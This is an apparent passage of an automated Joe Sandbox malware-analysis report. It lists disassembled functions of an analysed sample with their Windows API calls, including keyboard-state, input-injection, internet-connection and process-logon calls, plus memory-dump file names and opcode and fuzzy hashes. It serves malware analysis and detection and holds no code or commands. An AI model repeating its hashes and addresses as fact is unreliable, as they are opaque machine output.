                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 780911581-0
                                                                                                                                                          • Opcode ID: dcf0beca3ae49b48ca4437b94995c432d083f31ff5235fac548b08c3a4191357
                                                                                                                                                          • Instruction ID: b46fa5803a0604293d180740dd522e98a8c5db5b224e537ede517f1f579f6a7d
                                                                                                                                                          • Opcode Fuzzy Hash: dcf0beca3ae49b48ca4437b94995c432d083f31ff5235fac548b08c3a4191357
                                                                                                                                                          • Instruction Fuzzy Hash: 58A137756087119FCB10EF14D891B5AB7F4BF98360F158459F99AAB3A2DB30ED40CB82
                                                                                                                                                          Function 0012C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memmove.LIBCMT ref: 0012C419
                                                                                                                                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00166653,?,?,00000000), ref: 0012C495
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileRead_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1325644223-0
                                                                                                                                                          • Opcode ID: 777f64b0595bbaff23a1d9fdd2f026ad12fe2981efbf5656394022bdd164770b
                                                                                                                                                          • Instruction ID: 6d022e104c7683f0a88c47d1d7664023c76ae52cb75e248826533917e7c5f6a7
                                                                                                                                                          • Opcode Fuzzy Hash: 777f64b0595bbaff23a1d9fdd2f026ad12fe2981efbf5656394022bdd164770b
                                                                                                                                                          • Instruction Fuzzy Hash: 2DA1ED30A04629EBDF04CF65E880BAEFBB0FF15300F14C596E9659B291D735E961CB91
                                                                                                                                                          Function 001442EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3877424927-0
                                                                                                                                                          • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                          • Instruction ID: 1dfb5eba103fa3a2783be6a2fd1967497db6e80e957e707227dccc0f2c6c97d4
                                                                                                                                                          • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                          • Instruction Fuzzy Hash: 1051AE30A00216EBDB288FB988807AE77B5BF50724F288729F875962F1D7709E519B40
                                                                                                                                                          Function 0018C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0018C354
                                                                                                                                                          • ScreenToClient.USER32(?,00000002), ref: 0018C384
                                                                                                                                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0018C3EA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                          • Opcode ID: d44d17a29822de81540136fa08f03a3f3a0940cd0b2903e97471fcd47dccc571
                                                                                                                                                          • Instruction ID: e8e747266d432ebf95605125bdc5a8917e372e9493d5c7602650e72adb72d3ea
                                                                                                                                                          • Opcode Fuzzy Hash: d44d17a29822de81540136fa08f03a3f3a0940cd0b2903e97471fcd47dccc571
                                                                                                                                                          • Instruction Fuzzy Hash: FC515D71A00604EFCF10EF68D8C0AAE7BB6BB55360F248159F9159B291D770AE81CFA0
                                                                                                                                                          Function 0015D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0015D258
                                                                                                                                                          • __itow.LIBCMT ref: 0015D292
                                                                                                                                                            • Part of subcall function 0015D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0015D549
                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0015D2FB
                                                                                                                                                          • __itow.LIBCMT ref: 0015D350
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$__itow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3379773720-0
                                                                                                                                                          • Opcode ID: 90398ade15a0028f69db07c6d5cb876d38bf63fd4babdc91ad0657d798beb033
                                                                                                                                                          • Instruction ID: ccffe31efb7019ed95d552acf1dd358a186e65269362fe859f245e0d9edde1b8
                                                                                                                                                          • Opcode Fuzzy Hash: 90398ade15a0028f69db07c6d5cb876d38bf63fd4babdc91ad0657d798beb033
                                                                                                                                                          • Instruction Fuzzy Hash: 9D410871A00318AFDF21DF94E842FEE7BB9AF55700F000015FE15A7291DB749A59CB62
                                                                                                                                                          Function 0018B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0018B3E1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                          • Opcode ID: f649ecad5985e921584eab16fe50d34eab9bc6d8d41d741acf61dbca743d02e7
                                                                                                                                                          • Instruction ID: 04010ec35f916faba00e2bfcd6d7c49253eff2ba77b6cc451e0699fcbd9a63ae
                                                                                                                                                          • Opcode Fuzzy Hash: f649ecad5985e921584eab16fe50d34eab9bc6d8d41d741acf61dbca743d02e7
                                                                                                                                                          • Instruction Fuzzy Hash: 86316F34608204FBEB24AE58DCD6FAC3BA5BB06350F548512FA52D65A2C731EB819F51
                                                                                                                                                          Function 0018D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 0018D617
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0018D68D
                                                                                                                                                          • PtInRect.USER32(?,?,0018EB2C), ref: 0018D69D
                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0018D70E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                          • Opcode ID: 48cbd774e8477e9ca7c1748e48e58fca67310dee6f7a66f8763879567e03cce3
                                                                                                                                                          • Instruction ID: db63aaf30bf091ca4e41efd50ad15d6ef6f54dfebc016195bd99692355b4e31e
                                                                                                                                                          • Opcode Fuzzy Hash: 48cbd774e8477e9ca7c1748e48e58fca67310dee6f7a66f8763879567e03cce3
                                                                                                                                                          • Instruction Fuzzy Hash: C8416F34600259EFCB11EF98E884EAD7BF5BB45314F2841A9E409DF291E731EA81CF50
                                                                                                                                                          Function 00164497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 001644EE
                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0016450A
                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0016456A
                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 001645C8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                          • Opcode ID: 31d5eace49aabc91110630247c541935bfdfe85af903dd82e5487271bb78ae9a
                                                                                                                                                          • Instruction ID: bbbbbec3deaca8d57ec8e6f8d1c0f647e6fa5104a836f37edc881aff9c8bdf45
                                                                                                                                                          • Opcode Fuzzy Hash: 31d5eace49aabc91110630247c541935bfdfe85af903dd82e5487271bb78ae9a
                                                                                                                                                          • Instruction Fuzzy Hash: 42310371E002986FEF358B649C097FE7BBA9B5A310F04025AF0C3936D1C7748AA9D761
                                                                                                                                                          Function 00154DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00154DE8
                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00154E16
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00154E44
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00154E7A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                          • Opcode ID: ffa8704ae0d3417f03cef7c32987c0b12167c6921df153721dbeebb149258aa9
                                                                                                                                                          • Instruction ID: 1005b0342d162941db2a4d593f9245d44961b8e0622d90fcc4708aafedcb361f
                                                                                                                                                          • Opcode Fuzzy Hash: ffa8704ae0d3417f03cef7c32987c0b12167c6921df153721dbeebb149258aa9
                                                                                                                                                          • Instruction Fuzzy Hash: 5A31AC31600206EFDF218E74C846BAA7BB6FF4131AF158528E8718B1A0E734D899DB90
                                                                                                                                                          Function 00187AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00187AB6
                                                                                                                                                            • Part of subcall function 001669C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 001669E3
                                                                                                                                                            • Part of subcall function 001669C9: GetCurrentThreadId.KERNEL32 ref: 001669EA
                                                                                                                                                            • Part of subcall function 001669C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001669F1
                                                                                                                                                          • GetCaretPos.USER32(?), ref: 00187AC7
                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00187B00
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00187B06
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                          • Opcode ID: bf44e4d248e0b84724842ff7a64f63d3d55a0a7a3b9e3164ea60f4355d86e527
                                                                                                                                                          • Instruction ID: f958b29b5b9c660e871975454eee5dd91e69b2680c9529694daa73dff752243c
                                                                                                                                                          • Opcode Fuzzy Hash: bf44e4d248e0b84724842ff7a64f63d3d55a0a7a3b9e3164ea60f4355d86e527
                                                                                                                                                          • Instruction Fuzzy Hash: 4C31ED72D00108AFCB00EFB9DC859EFBBF9EF69314B10806AE815E7211D7359E058BA0
                                                                                                                                                          Function 0017497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001749B7
                                                                                                                                                            • Part of subcall function 00174A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174A60
                                                                                                                                                            • Part of subcall function 00174A41: InternetCloseHandle.WININET(00000000), ref: 00174AFD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1463438336-0
                                                                                                                                                          • Opcode ID: 2e71f340d7f588b09ef9054e950590566a92f26dc8ba26ad0acf2d31e762b768
                                                                                                                                                          • Instruction ID: 7525ea0c69d732f165e4b9b9d38b79e0635d247187191bf3bc06a1f05a252844
                                                                                                                                                          • Opcode Fuzzy Hash: 2e71f340d7f588b09ef9054e950590566a92f26dc8ba26ad0acf2d31e762b768
                                                                                                                                                          • Instruction Fuzzy Hash: FD21F631244A05BFDB169F60DC01FBBB7BAFF99704F10801AFA0A97950EB71D850A794
                                                                                                                                                          Function 0015BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0015BCD9
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0015BCE0
                                                                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 0015BCFA
                                                                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015BD29
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
